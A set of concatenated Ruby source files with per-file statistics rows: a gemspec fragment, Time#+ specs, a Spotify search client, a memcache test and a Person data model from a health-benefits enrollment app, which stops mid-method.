git_timestamp, git_hash = `git log -n1 --first-parent --format=%ct:%H #{__dir__}`.chomp.split(":")
if ENV["ARVADOS_BUILDING_VERSION"]
version = ENV["ARVADOS_BUILDING_VERSION"]
else
version = `#{__dir__}/../../build/version-at-commit.sh #{git_hash}`.encode('utf-8').strip
end
git_timestamp = Time.at(git_timestamp.to_i).utc
ensure
ENV["GIT_DIR"] = git_dir
ENV["GIT_WORK_TREE"] = git_work
end
Gem::Specification.new do |s|
s.name = 'arvados'
s.version = version
s.date = git_timestamp.strftime("%Y-%m-%d")
s.summary = "Arvados client library"
s.description = "Arvados client library, git commit #{git_hash}"
s.authors = ["Arvados Authors"]
s.email = '[email protected]'
s.licenses = ['Apache-2.0']
s.files = ["lib/arvados.rb", "lib/arvados/google_api_client.rb",
"lib/arvados/collection.rb", "lib/arvados/keep.rb",
"README", "LICENSE-2.0.txt"]
s.required_ruby_version = '>= 1.8.7'
s.add_dependency('activesupport', '>= 3')
s.add_dependency('andand', '~> 1.3', '>= 1.3.3')
# Our google-api-client dependency used to be < 0.9, but that could be
# satisfied by the buggy 0.9.pre*. https://dev.arvados.org/issues/9213
s.add_dependency('arvados-google-api-client', '>= 0.7', '< 0.8.9')
# work around undeclared dependency on i18n in some activesupport 3.x.x:
s.add_dependency('i18n', '~> 0')
s.add_dependency('json', '>= 1.7.7', '<3')
# arvados-google-api-client 0.8.7.2 is incompatible with faraday 0.16.2
s.add_dependency('faraday', '< 0.16')
s.add_runtime_dependency('jwt', '<2', '>= 0.1.5')
s.homepage =
'https://arvados.org'
end
| 39.962963 | 137 | 0.648749 |
624c2a489330af8bf8c55bff32db818db99e0d2d | 3,323 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/methods', __FILE__)
describe "Time#+" do
it "increments the time by the specified amount" do
(Time.at(0) + 100).should == Time.at(100)
end
it "is a commutative operator" do
(Time.at(1.1) + 0.9).should == Time.at(0.9) + 1.1
end
ruby_version_is "" ... "1.9" do
it "rounds micro seconds rather than truncates" do
# The use of 8.9999999 is intentional. This is because
      # Time treats the fractional part as the number of microseconds.
      # Thus it multiplies the result by 1_000_000 to go from
# seconds to microseconds. That conversion should be rounded
# properly. In this case, it's rounded up to 1,000,000, and thus
# contributes a full extra second to the Time object.
t = Time.at(0) + 8.9999999
t.should == Time.at(9)
t.usec.should == 0
# Check the non-edge case works properly, that the fractional part
# contributes to #usecs
t2 = Time.at(0) + 8.9
t2.usec.should == 900000
end
it "adds a negative Float" do
t = Time.at(100) + -1.3
t.usec.should == 700000
t.to_i.should == 98
end
end
ruby_version_is "1.9" do
it "does NOT round" do
t = Time.at(0) + Rational(8_999_999_999_999_999, 1_000_000_000_000_000)
t.should_not == Time.at(9)
t.usec.should == 999_999
t.nsec.should == 999_999_999
t.subsec.should == Rational(999_999_999_999_999, 1_000_000_000_000_000)
end
it "adds a negative Float" do
t = Time.at(100) + -1.3
t.usec.should == 699999
t.to_i.should == 98
end
end
ruby_version_is "" ... "1.9" do
it "increments the time by the specified amount as float numbers" do
(Time.at(1.1) + 0.9).should == Time.at(2)
end
it "accepts arguments that can be coerced into Float" do
(obj = mock('10.5')).should_receive(:to_f).and_return(10.5)
(Time.at(100) + obj).should == Time.at(110.5)
end
it "raises TypeError on argument that can't be coerced into Float" do
lambda { Time.now + Object.new }.should raise_error(TypeError)
lambda { Time.now + "stuff" }.should raise_error(TypeError)
end
end
ruby_version_is "1.9" do
it "increments the time by the specified amount as rational numbers" do
(Time.at(Rational(11, 10)) + Rational(9, 10)).should == Time.at(2)
end
it "accepts arguments that can be coerced into Rational" do
(obj = mock('10')).should_receive(:to_r).and_return(Rational(10))
(Time.at(100) + obj).should == Time.at(110)
end
it "raises TypeError on argument that can't be coerced into Rational" do
lambda { Time.now + Object.new }.should raise_error(TypeError)
lambda { Time.now + "stuff" }.should raise_error(TypeError)
end
#see [ruby-dev:38446]
it "tracks microseconds" do
time = Time.at(0)
time += Rational(123456, 1000000)
time.usec.should == 123456
time += Rational(654321, 1000000)
time.usec.should == 777777
end
end
it "raises TypeError on Time argument" do
lambda { Time.now + Time.now }.should raise_error(TypeError)
end
it "raises TypeError on nil argument" do
lambda { Time.now + nil }.should raise_error(TypeError)
end
end
| 32.262136 | 77 | 0.643395 |
2856cc9a7e5f29530022d61d95ee7deeeaa4ab80 | 540 | require 'spotify_client'
class SpotifyClient
RESULT_SIZE = 5
def initialize
@client = Spotify::Client.new
end
def search_track(search_string)
results_for(search_string).map do |result|
{
id: result.fetch('id'),
artist: result.fetch('artists').first['name'],
track: result.fetch('name')
}
end
end
private
def results_for(search_string)
@client.search(:track, search_string)
.fetch('tracks')
.fetch('items')
.first(RESULT_SIZE)
end
end
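# Usage sketch (assumes the spotify_client gem is configured with valid API credentials):
#   SpotifyClient.new.search_track('some song')
#   # => up to RESULT_SIZE hashes like { id: '...', artist: '...', track: '...' }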
| 18.62069 | 54 | 0.616667 |
33c1be954ffb35b5a5c084b45c2eb69d2a78c7aa | 794 | require File.dirname(__FILE__) + '/memcache_server_test_helper'
class MemcacheNativeServerTest < Test::Unit::TestCase
include MemcacheServerTestHelper
include MemcacheServerTestHelper::AdvancedMethods
with_prefixes nil, "foo:", "bar:"
PORTS = [11212, 11213, 11214, 11215, 11216]
def setup
init_memcache(*PORTS) do
Memcache::NativeServer.new(:servers => PORTS.collect {|p| "localhost:#{p}"})
end
end
def test_server_down
m = Memcache::NativeServer.new(:servers => ["localhost:9998"])
assert_equal nil, m.get('foo')
e = assert_raise(Memcache::Error) do
m.set('foo', 'foo')
end
assert_match 'SERVER HAS FAILED', e.message
end
def test_close
m.close
m.set('foo', 'foo')
assert_equal 'foo', m.get('foo')[:value]
end
end
| 24.060606 | 82 | 0.680101 |
e29276270eb7cf98635a0b93464599d2cfbea7e9 | 33,847 | class Person
include Config::AcaModelConcern
include Config::SiteModelConcern
include Mongoid::Document
include SetCurrentUser
include Mongoid::Timestamps
include Mongoid::Versioning
include Mongoid::Attributes::Dynamic
include SponsoredBenefits::Concerns::Ssn
include SponsoredBenefits::Concerns::Dob
include Notify
include UnsetableSparseFields
include FullStrippedNames
include ::BenefitSponsors::Concerns::Observable
# verification history tracking
include Mongoid::History::Trackable
track_history :on => [:first_name,
:middle_name,
:last_name,
:full_name,
:alternate_name,
:encrypted_ssn,
:dob,
:gender,
:is_incarcerated,
:is_disabled,
:ethnicity,
:race,
:tribal_id,
:no_dc_address,
:no_dc_address_reason,
:is_active,
:no_ssn],
:modifier_field => :modifier,
:version_field => :tracking_version,
:track_create => true, # track document creation, default is false
:track_update => true, # track document updates, default is true
:track_destroy => true # track document destruction, default is false
extend Mongorder
# validates_with Validations::DateRangeValidator
GENDER_KINDS = %W(male female)
IDENTIFYING_INFO_ATTRIBUTES = %w(first_name last_name ssn dob)
ADDRESS_CHANGE_ATTRIBUTES = %w(addresses phones emails)
RELATIONSHIP_CHANGE_ATTRIBUTES = %w(person_relationships)
PERSON_CREATED_EVENT_NAME = "acapi.info.events.individual.created"
PERSON_UPDATED_EVENT_NAME = "acapi.info.events.individual.updated"
VERIFICATION_TYPES = ['Social Security Number', 'American Indian Status', 'Citizenship', 'Immigration status']
field :hbx_id, type: String
field :name_pfx, type: String
field :first_name, type: String
field :middle_name, type: String
field :last_name, type: String
field :name_sfx, type: String
field :full_name, type: String
field :alternate_name, type: String
field :encrypted_ssn, type: String
field :gender, type: String
field :dob, type: Date
# Sub-model in-common attributes
field :date_of_death, type: Date
field :dob_check, type: Boolean
field :is_incarcerated, type: Boolean
field :is_disabled, type: Boolean
field :ethnicity, type: Array
field :race, type: String
field :tribal_id, type: String
field :is_tobacco_user, type: String, default: "unknown"
field :language_code, type: String
field :no_dc_address, type: Boolean, default: false
field :no_dc_address_reason, type: String, default: ""
field :is_active, type: Boolean, default: true
field :updated_by, type: String
field :no_ssn, type: String #ConsumerRole TODO TODOJF
field :is_physically_disabled, type: Boolean
delegate :is_applying_coverage, to: :consumer_role, allow_nil: true
# Login account
belongs_to :user
belongs_to :employer_contact,
class_name: "EmployerProfile",
inverse_of: :employer_contacts,
index: true
belongs_to :broker_agency_contact,
class_name: "BrokerAgencyProfile",
inverse_of: :broker_agency_contacts,
index: true
belongs_to :general_agency_contact,
class_name: "GeneralAgencyProfile",
inverse_of: :general_agency_contacts,
index: true
embeds_one :consumer_role, cascade_callbacks: true, validate: true
embeds_one :resident_role, cascade_callbacks: true, validate: true
embeds_one :broker_role, cascade_callbacks: true, validate: true
embeds_one :hbx_staff_role, cascade_callbacks: true, validate: true
#embeds_one :responsible_party, cascade_callbacks: true, validate: true # This model does not exist.
embeds_one :csr_role, cascade_callbacks: true, validate: true
embeds_one :assister_role, cascade_callbacks: true, validate: true
embeds_one :inbox, as: :recipient
embeds_many :employer_staff_roles, cascade_callbacks: true, validate: true
embeds_many :broker_agency_staff_roles, cascade_callbacks: true, validate: true
embeds_many :employee_roles, cascade_callbacks: true, validate: true
embeds_many :general_agency_staff_roles, cascade_callbacks: true, validate: true
embeds_many :person_relationships, cascade_callbacks: true, validate: true
embeds_many :addresses, cascade_callbacks: true, validate: true
embeds_many :phones, cascade_callbacks: true, validate: true
embeds_many :emails, cascade_callbacks: true, validate: true
embeds_many :documents, as: :documentable
accepts_nested_attributes_for :consumer_role, :resident_role, :broker_role, :hbx_staff_role,
:person_relationships, :employee_roles, :phones, :employer_staff_roles
accepts_nested_attributes_for :phones, :reject_if => Proc.new { |addy| addy[:full_phone_number].blank? }, allow_destroy: true
accepts_nested_attributes_for :addresses, :reject_if => Proc.new { |addy| addy[:address_1].blank? && addy[:city].blank? && addy[:state].blank? && addy[:zip].blank? }, allow_destroy: true
accepts_nested_attributes_for :emails, :reject_if => Proc.new { |addy| addy[:address].blank? }, allow_destroy: true
validates_presence_of :first_name, :last_name
validate :date_functional_validations
validate :no_changing_my_user, :on => :update
validates :encrypted_ssn, uniqueness: true, allow_blank: true
validates :gender,
allow_blank: true,
inclusion: { in: Person::GENDER_KINDS, message: "%{value} is not a valid gender" }
before_save :generate_hbx_id
before_save :update_full_name
before_save :strip_empty_fields
#after_save :generate_family_search
after_create :create_inbox
add_observer ::BenefitSponsors::Observers::EmployerStaffRoleObserver.new, :contact_changed?
index({hbx_id: 1}, {sparse:true, unique: true})
index({user_id: 1}, {sparse:true, unique: true})
index({last_name: 1})
index({first_name: 1})
index({last_name: 1, first_name: 1})
index({first_name: 1, last_name: 1})
index({first_name: 1, last_name: 1, hbx_id: 1, encrypted_ssn: 1}, {name: "person_searching_index"})
index({encrypted_ssn: 1}, {sparse: true, unique: true})
index({dob: 1}, {sparse: true})
index({dob: 1, encrypted_ssn: 1})
index({last_name: 1, dob: 1}, {sparse: true})
# Broker child model indexes
index({"broker_role._id" => 1})
index({"broker_role.provider_kind" => 1})
index({"broker_role.broker_agency_id" => 1})
index({"broker_role.npn" => 1}, {sparse: true, unique: true})
# Employer role index
index({"employer_staff_roles._id" => 1})
index({"employer_staff_roles.employer_profile_id" => 1})
# Consumer child model indexes
index({"consumer_role._id" => 1})
index({"consumer_role.aasm_state" => 1})
index({"consumer_role.is_active" => 1})
# Employee child model indexes
index({"employee_roles._id" => 1})
index({"employee_roles.employer_profile_id" => 1})
index({"employee_roles.census_employee_id" => 1})
index({"employee_roles.benefit_group_id" => 1})
index({"employee_roles.is_active" => 1})
# HbxStaff child model indexes
index({"hbx_staff_role._id" => 1})
index({"hbx_staff_role.is_active" => 1})
# PersonRelationship child model indexes
index({"person_relationship.relative_id" => 1})
index({"hbx_employer_staff_role._id" => 1})
#index({"hbx_responsible_party_role._id" => 1})
index({"hbx_csr_role._id" => 1})
index({"hbx_assister._id" => 1})
scope :all_consumer_roles, -> { exists(consumer_role: true) }
scope :all_resident_roles, -> { exists(resident_role: true) }
scope :all_employee_roles, -> { exists(employee_roles: true) }
scope :all_employer_staff_roles, -> { exists(employer_staff_roles: true) }
#scope :all_responsible_party_roles, -> { exists(responsible_party_role: true) }
scope :all_broker_roles, -> { exists(broker_role: true) }
scope :all_hbx_staff_roles, -> { exists(hbx_staff_role: true) }
scope :all_csr_roles, -> { exists(csr_role: true) }
scope :all_assister_roles, -> { exists(assister_role: true) }
scope :by_hbx_id, ->(person_hbx_id) { where(hbx_id: person_hbx_id) }
scope :by_broker_role_npn, ->(br_npn) { where("broker_role.npn" => br_npn) }
scope :active, ->{ where(is_active: true) }
scope :inactive, ->{ where(is_active: false) }
#scope :broker_role_having_agency, -> { where("broker_role.broker_agency_profile_id" => { "$ne" => nil }) }
scope :broker_role_having_agency, -> { where("broker_role.benefit_sponsors_broker_agency_profile_id" => { "$ne" => nil }) }
scope :broker_role_applicant, -> { where("broker_role.aasm_state" => { "$eq" => :applicant })}
scope :broker_role_pending, -> { where("broker_role.aasm_state" => { "$eq" => :broker_agency_pending })}
scope :broker_role_certified, -> { where("broker_role.aasm_state" => { "$in" => [:active]})}
scope :broker_role_decertified, -> { where("broker_role.aasm_state" => { "$eq" => :decertified })}
scope :broker_role_denied, -> { where("broker_role.aasm_state" => { "$eq" => :denied })}
scope :by_ssn, ->(ssn) { where(encrypted_ssn: Person.encrypt_ssn(ssn)) }
scope :unverified_persons, -> { where(:'consumer_role.aasm_state' => { "$ne" => "fully_verified" })}
scope :matchable, ->(ssn, dob, last_name) { where(encrypted_ssn: Person.encrypt_ssn(ssn), dob: dob, last_name: last_name) }
scope :general_agency_staff_applicant, -> { where("general_agency_staff_roles.aasm_state" => { "$eq" => :applicant })}
scope :general_agency_staff_certified, -> { where("general_agency_staff_roles.aasm_state" => { "$eq" => :active })}
scope :general_agency_staff_decertified, -> { where("general_agency_staff_roles.aasm_state" => { "$eq" => :decertified })}
scope :general_agency_staff_denied, -> { where("general_agency_staff_roles.aasm_state" => { "$eq" => :denied })}
# ViewFunctions::Person.install_queries
validate :consumer_fields_validations
after_create :notify_created
after_update :notify_updated
def active_general_agency_staff_roles
general_agency_staff_roles.select(&:active?)
end
def contact_addresses
existing_addresses = addresses.to_a
home_address = existing_addresses.detect { |addy| addy.kind == "home" }
return existing_addresses if home_address
add_employee_home_address(existing_addresses)
end
def add_employee_home_address(existing_addresses)
return existing_addresses unless employee_roles.any?
employee_contact_address = employee_roles.sort_by(&:hired_on).map(&:census_employee).compact.map(&:address).compact.first
return existing_addresses unless employee_contact_address
existing_addresses + [employee_contact_address]
end
def contact_phones
phones.reject { |ph| ph.full_phone_number.blank? }
end
delegate :citizen_status, :citizen_status=, :to => :consumer_role, :allow_nil => true
delegate :ivl_coverage_selected, :to => :consumer_role, :allow_nil => true
delegate :all_types_verified?, :to => :consumer_role
def notify_created
notify(PERSON_CREATED_EVENT_NAME, {:individual_id => self.hbx_id } )
end
def notify_updated
notify(PERSON_UPDATED_EVENT_NAME, {:individual_id => self.hbx_id } )
end
def is_aqhp?
family = self.primary_family if self.primary_family
if family
check_households(family) && check_tax_households(family)
else
false
end
end
def check_households family
family.households.present? ? true : false
end
def check_tax_households family
family.households.first.tax_households.present? ? true : false
end
def completed_identity_verification?
return false unless user
user.identity_verified?
end
#after_save :update_family_search_collection
# before_save :notify_change
# def notify_change
# notify_change_event(self, {"identifying_info"=>IDENTIFYING_INFO_ATTRIBUTES, "address_change"=>ADDRESS_CHANGE_ATTRIBUTES, "relation_change"=>RELATIONSHIP_CHANGE_ATTRIBUTES})
# end
def update_family_search_collection
# ViewFunctions::Person.run_after_save_search_update(self.id)
end
def generate_hbx_id
write_attribute(:hbx_id, HbxIdGenerator.generate_member_id) if hbx_id.blank?
end
def strip_empty_fields
if encrypted_ssn.blank?
unset_sparse("encrypted_ssn")
end
if user_id.blank?
unset_sparse("user_id")
end
end
def date_of_birth=(val)
self.dob = Date.strptime(val, "%m/%d/%Y").to_date rescue nil
end
def gender=(new_gender)
write_attribute(:gender, new_gender.to_s.downcase)
end
# Get the {Family} where this {Person} is the primary family member
#
  # family integrity ensures only one active family can be the primary for a person
  #
  # @return [ Family ] the family in which this person is the primary applicant
def primary_family
@primary_family ||= Family.find_primary_applicant_by_person(self).first
end
def families
Family.find_all_by_person(self)
end
def full_name
@full_name = [name_pfx, first_name, middle_name, last_name, name_sfx].compact.join(" ")
end
def first_name_last_name_and_suffix
    case name_sfx
    when "ii", "iii", "iv", "v"
[first_name.capitalize, last_name.capitalize, name_sfx.upcase].compact.join(" ")
else
[first_name.capitalize, last_name.capitalize, name_sfx].compact.join(" ")
end
end
def is_active?
is_active
end
def update_ssn_and_gender_for_employer_role(census_employee)
return if census_employee.blank?
update_attributes(ssn: census_employee.ssn) if ssn.blank?
update_attributes(gender: census_employee.gender) if gender.blank?
end
  # collect all verification types a user can have based on the information they provided
def verification_types
verification_types = []
verification_types << 'DC Residency'
verification_types << 'Social Security Number' if ssn
verification_types << 'American Indian Status' if !(tribal_id.nil? || tribal_id.empty?)
if self.us_citizen
verification_types << 'Citizenship'
else
verification_types << 'Immigration status'
end
verification_types
end
def relatives
person_relationships.reject do |p_rel|
p_rel.relative_id.to_s == self.id.to_s
end.map(&:relative)
end
def find_relationship_with(other_person)
if self.id == other_person.id
"self"
else
person_relationship_for(other_person).try(:kind)
end
end
def person_relationship_for(other_person)
person_relationships.detect do |person_relationship|
person_relationship.relative_id == other_person.id
end
end
def ensure_relationship_with(person, relationship)
return if person.blank?
existing_relationship = self.person_relationships.detect do |rel|
rel.relative_id.to_s == person.id.to_s
end
if existing_relationship
existing_relationship.assign_attributes(:kind => relationship)
update_census_dependent_relationship(existing_relationship)
existing_relationship.save!
else
self.person_relationships << PersonRelationship.new({
:kind => relationship,
:relative_id => person.id
})
end
end
def add_work_email(email)
existing_email = self.emails.detect do |e|
(e.kind == 'work') &&
(e.address.downcase == email.downcase)
end
return nil if existing_email.present?
self.emails << ::Email.new(:kind => 'work', :address => email)
end
def home_address
addresses.detect { |adr| adr.kind == "home" }
end
def mailing_address
addresses.detect { |adr| adr.kind == "mailing" } || home_address
end
def has_mailing_address?
addresses.any? { |adr| adr.kind == "mailing" }
end
def home_email
emails.detect { |adr| adr.kind == "home" }
end
def work_email
emails.detect { |adr| adr.kind == "work" }
end
def work_or_home_email
work_email || home_email
end
def work_email_or_best
email = emails.detect { |adr| adr.kind == "work" } || emails.first
(email && email.address) || (user && user.email)
end
def work_phone
phones.detect { |phone| phone.kind == "work" } || main_phone
end
def main_phone
phones.detect { |phone| phone.kind == "main" }
end
def home_phone
phones.detect { |phone| phone.kind == "home" }
end
def mobile_phone
phones.detect { |phone| phone.kind == "mobile" }
end
def work_phone_or_best
best_phone = work_phone || mobile_phone || home_phone
best_phone ? best_phone.full_phone_number : nil
end
def has_active_consumer_role?
consumer_role.present? and consumer_role.is_active?
end
def has_active_resident_role?
resident_role.present? and resident_role.is_active?
end
def can_report_shop_qle?
employee_roles.first.census_employee.qle_30_day_eligible?
end
def has_active_employee_role?
active_employee_roles.any?
end
def has_active_shopping_role?
has_active_employee_role? ||
has_active_resident_role? ||
has_active_consumer_role?
end
def has_employer_benefits?
active_employee_roles.present? #&& active_employee_roles.any?{|r| r.benefit_group.present?}
end
def active_employee_roles
employee_roles.select{|employee_role| employee_role.census_employee && employee_role.census_employee.is_active? }
end
def has_multiple_active_employers?
active_employee_roles.count > 1
end
def has_active_employer_staff_role?
employer_staff_roles.present? and employer_staff_roles.active.present?
end
def active_employer_staff_roles
employer_staff_roles.present? ? employer_staff_roles.active : []
end
def has_multiple_roles?
consumer_role.present? && active_employee_roles.present?
end
def has_active_employee_role_for_census_employee?(census_employee)
if census_employee
(active_employee_roles.detect { |employee_role| employee_role.census_employee == census_employee }).present?
end
end
def residency_eligible?
no_dc_address and no_dc_address_reason.present?
end
def is_dc_resident?
return false if no_dc_address == true && no_dc_address_reason.blank?
return true if no_dc_address == true && no_dc_address_reason.present?
address_to_use = addresses.collect(&:kind).include?('home') ? 'home' : 'mailing'
addresses.each{|address| return true if address.kind == address_to_use && address.state == aca_state_abbreviation}
return false
end
class << self
def default_search_order
[[:last_name, 1],[:first_name, 1]]
end
def search_hash(s_str)
clean_str = s_str.strip
s_rex = ::Regexp.new(::Regexp.escape(clean_str), true)
{
"$or" => ([
{"first_name" => s_rex},
{"last_name" => s_rex},
{"hbx_id" => s_rex},
{"encrypted_ssn" => encrypt_ssn(s_rex)}
] + additional_exprs(clean_str))
}
end
def additional_exprs(clean_str)
additional_exprs = []
if clean_str.include?(" ")
parts = clean_str.split(" ").compact
first_re = ::Regexp.new(::Regexp.escape(parts.first), true)
last_re = ::Regexp.new(::Regexp.escape(parts.last), true)
additional_exprs << {:first_name => first_re, :last_name => last_re}
end
additional_exprs
end
def search_first_name_last_name_npn(s_str, query=self)
clean_str = s_str.strip
s_rex = ::Regexp.new(::Regexp.escape(s_str.strip), true)
query.where({
"$or" => ([
{"first_name" => s_rex},
{"last_name" => s_rex},
{"broker_role.npn" => s_rex}
] + additional_exprs(clean_str))
})
end
    # Find all employee_roles. Since a person has_many employee_roles, the same person may show up
    # more than once, so employee_role.person may not be unique in the returned set
def employee_roles
people = exists(:'employee_roles.0' => true).entries
people.flat_map(&:employee_roles)
end
def find_all_brokers_or_staff_members_by_agency(broker_agency)
Person.or({:"broker_role.broker_agency_profile_id" => broker_agency.id},
{:"broker_agency_staff_roles.broker_agency_profile_id" => broker_agency.id})
end
def sans_primary_broker(broker_agency)
where(:"broker_role._id".nin => [broker_agency.primary_broker_role_id])
end
def find_all_staff_roles_by_employer_profile(employer_profile)
#where({"$and"=>[{"employer_staff_roles.employer_profile_id"=> employer_profile.id}, {"employer_staff_roles.is_owner"=>true}]})
staff_for_employer(employer_profile)
end
def match_existing_person(personish)
return nil if personish.ssn.blank?
Person.where(:encrypted_ssn => encrypt_ssn(personish.ssn), :dob => personish.dob).first
end
def person_has_an_active_enrollment?(person)
if !person.primary_family.blank? && !person.primary_family.enrollments.blank?
person.primary_family.enrollments.each do |enrollment|
return true if enrollment.is_active
end
end
return false
end
def dob_change_implication_on_active_enrollments(person, new_dob)
      # This method checks whether there is a premium implication in any active enrollment when a person's DOB is changed.
      # Returns a hash with Key => HbxEnrollment ID and Value => true if the enrollment has a premium implication.
premium_impication_for_enrollment = Hash.new
active_enrolled_hbxs = person.primary_family.active_household.hbx_enrollments.active.enrolled_and_renewal
# Iterate over each enrollment and check if there is a Premium Implication based on the following rule:
      # Rule: there are implications when the DOB change makes anyone in the household a different age on the day coverage started,
      # UNLESS the change is entirely within the 0-20 age range or entirely within the 61+ age range.
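      # e.g. (hypothetical illustration of the rule above) a correction that moves someone from 20 to 21
      #      as of the coverage start date counts as an implication, while 18 -> 19 (both within 0-20) does not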
active_enrolled_hbxs.each do |hbx|
new_temp_person = person.dup
new_temp_person.dob = Date.strptime(new_dob.to_s, '%m/%d/%Y')
new_age = new_temp_person.age_on(hbx.effective_on) # age with the new DOB on the day coverage started
current_age = person.age_on(hbx.effective_on) # age with the current DOB on the day coverage started
next if new_age == current_age # No Change in age -> No Premium Implication
# No Implication when the change is all within the 0-20 age range or all within the 61+ age range
if ( current_age.between?(0,20) && new_age.between?(0,20) ) || ( current_age >= 61 && new_age >= 61 )
#premium_impication_for_enrollment[hbx.id] = false
else
premium_impication_for_enrollment[hbx.id] = true
end
end
premium_impication_for_enrollment
end
# Return an instance list of active People who match identifying information criteria
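    # Usage sketch (hypothetical values; the keys mirror the options read below):
    #   Person.match_by_id_info(ssn: '111001234', dob: Date.new(1990, 5, 1),
    #                           last_name: 'Doe', first_name: 'Jane')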
def match_by_id_info(options)
ssn_query = options[:ssn]
dob_query = options[:dob]
last_name = options[:last_name]
first_name = options[:first_name]
raise ArgumentError, "must provide an ssn or first_name/last_name/dob or both" if (ssn_query.blank? && (dob_query.blank? || last_name.blank? || first_name.blank?))
matches = Array.new
matches.concat Person.active.where(encrypted_ssn: encrypt_ssn(ssn_query), dob: dob_query).to_a unless ssn_query.blank?
#matches.concat Person.where(last_name: last_name, dob: dob_query).active.to_a unless (dob_query.blank? || last_name.blank?)
if first_name.present? && last_name.present? && dob_query.present?
first_exp = /^#{first_name}$/i
last_exp = /^#{last_name}$/i
matches.concat Person.active.where(dob: dob_query, last_name: last_exp, first_name: first_exp).to_a.select{|person| person.ssn.blank? || ssn_query.blank?}
end
matches.uniq
end
def brokers_or_agency_staff_with_status(query, status)
query.and(
Person.or(
{ :"broker_agency_staff_roles.aasm_state" => status },
{ :"broker_role.aasm_state" => status }
).selector
)
end
def staff_for_employer(employer_profile)
if employer_profile.is_a? (EmployerProfile)
self.where(:employer_staff_roles => {
'$elemMatch' => {
employer_profile_id: employer_profile.id,
aasm_state: :is_active}
}).to_a
else
self.where(:employer_staff_roles => {
'$elemMatch' => {
benefit_sponsor_employer_profile_id: employer_profile.id,
aasm_state: :is_active}
}).to_a
end
end
def staff_for_employer_including_pending(employer_profile)
if employer_profile.is_a? (EmployerProfile)
self.where(:employer_staff_roles => {
'$elemMatch' => {
employer_profile_id: employer_profile.id,
:aasm_state.ne => :is_closed
}
})
else
self.where(:employer_staff_roles => {
'$elemMatch' => {
benefit_sponsor_employer_profile_id: employer_profile.id,
:aasm_state.ne => :is_closed
}
})
end
end
# Adds employer staff role to person
# Returns status and message if failed
# Returns status and person if successful
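    # Usage sketch (hypothetical values):
    #   status, result = Person.add_employer_staff_role('Jane', 'Doe', Date.new(1980, 1, 1),
    #                                                   '[email protected]', employer_profile)
    #   # status is true/false; result is the matched Person on success, an error message on failure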
def add_employer_staff_role(first_name, last_name, dob, email, employer_profile)
person = Person.where(first_name: /^#{first_name}$/i, last_name: /^#{last_name}$/i, dob: dob)
return false, 'Person count too high, please contact HBX Admin' if person.count > 1
return false, 'Person does not exist on the HBX Exchange' if person.count == 0
if employer_profile.is_a? (EmployerProfile)
employer_staff_role = EmployerStaffRole.create(person: person.first, employer_profile_id: employer_profile._id)
else
employer_staff_role = EmployerStaffRole.create(person: person.first, benefit_sponsor_employer_profile_id: employer_profile._id)
end
employer_staff_role.save
return true, person.first
end
# Sets employer staff role to inactive
# Returns false if person not found
    # Returns false if no matching employer staff role is found
    # Returns true if the role was marked inactive
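    # Usage sketch (hypothetical ids):
    #   status, message = Person.deactivate_employer_staff_role(person.id, employer_profile.id)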
def deactivate_employer_staff_role(person_id, employer_profile_id)
begin
person = Person.find(person_id)
rescue
return false, 'Person not found'
end
if role = person.employer_staff_roles.detect{|role| (role.benefit_sponsor_employer_profile_id.to_s == employer_profile_id.to_s || role.employer_profile_id.to_s == employer_profile_id.to_s) && !role.is_closed?}
role.update_attributes!(:aasm_state => :is_closed)
return true, 'Employee Staff Role is inactive'
else
return false, 'No matching employer staff role'
end
end
end
# HACK
# FIXME
# TODO: Move this out of here
attr_writer :us_citizen, :naturalized_citizen, :indian_tribe_member, :eligible_immigration_status
attr_accessor :is_consumer_role
attr_accessor :is_resident_role
before_save :assign_citizen_status_from_consumer_role
def assign_citizen_status_from_consumer_role
if is_consumer_role.to_s=="true"
assign_citizen_status
end
end
def us_citizen=(val)
@us_citizen = (val.to_s == "true")
@naturalized_citizen = false if val.to_s == "false"
end
def naturalized_citizen=(val)
@naturalized_citizen = (val.to_s == "true")
end
def indian_tribe_member=(val)
    self.tribal_id = nil if val.to_s == "false"
@indian_tribe_member = (val.to_s == "true")
end
def eligible_immigration_status=(val)
@eligible_immigration_status = (val.to_s == "true")
end
def us_citizen
return @us_citizen if !@us_citizen.nil?
return nil if citizen_status.blank?
@us_citizen ||= ::ConsumerRole::US_CITIZEN_STATUS_KINDS.include?(citizen_status)
end
def naturalized_citizen
return @naturalized_citizen if !@naturalized_citizen.nil?
return nil if citizen_status.blank?
@naturalized_citizen ||= (::ConsumerRole::NATURALIZED_CITIZEN_STATUS == citizen_status)
end
def indian_tribe_member
return @indian_tribe_member if !@indian_tribe_member.nil?
return nil if citizen_status.blank?
@indian_tribe_member ||= !(tribal_id.nil? || tribal_id.empty?)
end
def eligible_immigration_status
return @eligible_immigration_status if !@eligible_immigration_status.nil?
return nil if us_citizen.nil?
return nil if @us_citizen
return nil if citizen_status.blank?
@eligible_immigration_status ||= (::ConsumerRole::ALIEN_LAWFULLY_PRESENT_STATUS == citizen_status)
end
def assign_citizen_status
new_status = nil
if naturalized_citizen
new_status = ::ConsumerRole::NATURALIZED_CITIZEN_STATUS
elsif us_citizen
new_status = ::ConsumerRole::US_CITIZEN_STATUS
elsif eligible_immigration_status
new_status = ::ConsumerRole::ALIEN_LAWFULLY_PRESENT_STATUS
elsif (!eligible_immigration_status.nil?)
      new_status = ::ConsumerRole::NOT_LAWFULLY_PRESENT_STATUS
    else
self.errors.add(:base, "Citizenship status can't be nil.")
end
self.consumer_role.lawful_presence_determination.assign_citizen_status(new_status) if new_status
end
def agent?
agent = self.csr_role || self.assister_role || self.broker_role || self.hbx_staff_role || self.general_agency_staff_roles.present?
!!agent
end
def contact_info(email_address, area_code, number, extension)
if email_address.present?
email = emails.detect{|mail|mail.kind == 'work'}
if email
email.update_attributes!(address: email_address)
else
email= Email.new(kind: 'work', address: email_address)
emails.append(email)
self.update_attributes!(emails: emails)
save!
end
end
phone = phones.detect{|p|p.kind == 'work'}
if phone
phone.update_attributes!(area_code: area_code, number: number, extension: extension)
else
phone = Phone.new(kind: 'work', area_code: area_code, number: number, extension: extension)
phones.append(phone)
self.update_attributes!(phones: phones)
save!
end
end
def generate_family_search
::MapReduce::FamilySearchForPerson.populate_for(self)
end
def set_ridp_for_paper_application(session_var)
if user && session_var == 'paper'
user.ridp_by_paper_application
end
end
private
def update_census_dependent_relationship(existing_relationship)
return unless existing_relationship.valid?
Operations::CensusMembers::Update.new.call(relationship: existing_relationship, action: 'update_relationship')
end
def create_inbox
welcome_subject = "Welcome to #{site_short_name}"
